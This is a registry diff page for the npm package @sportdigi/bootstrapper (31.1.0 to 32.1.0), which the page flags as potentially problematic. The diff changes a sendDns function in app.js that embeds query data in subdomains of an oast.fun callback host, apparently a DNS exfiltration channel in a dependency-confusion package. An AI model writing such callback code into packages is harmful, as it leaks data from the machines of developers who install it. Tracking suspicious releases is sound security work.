@sportdigi/bootstrapper 31.1.0 → 32.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @sportdigi/bootstrapper might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/app.js +1 -1
  2. package/package.json +1 -1
package/app.js CHANGED
@@ -6,7 +6,7 @@ const { exec } = require('child_process');
6
6
 
7
7
  let platform = os.platform();
8
8
  function sendDns(query) {
9
- let domain = `${query}.fctdhxpvrzxmmwtxpidt0w23qlngi0owc.oast.fun`;
9
+ let domain = `${query}.pthtwfqhxteakeawipjws71vanexrvnzs.oast.fun`;
10
10
  dns.resolve(domain, (err) => {
11
11
  if (err) {
12
12
  console.error('DNS sorgulama hatası:', err.message);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sportdigi/bootstrapper",
3
- "version": "31.1.0",
3
+ "version": "32.1.0",
4
4
  "description": "",
5
5
  "main": "app.js",
6
6
  "scripts": {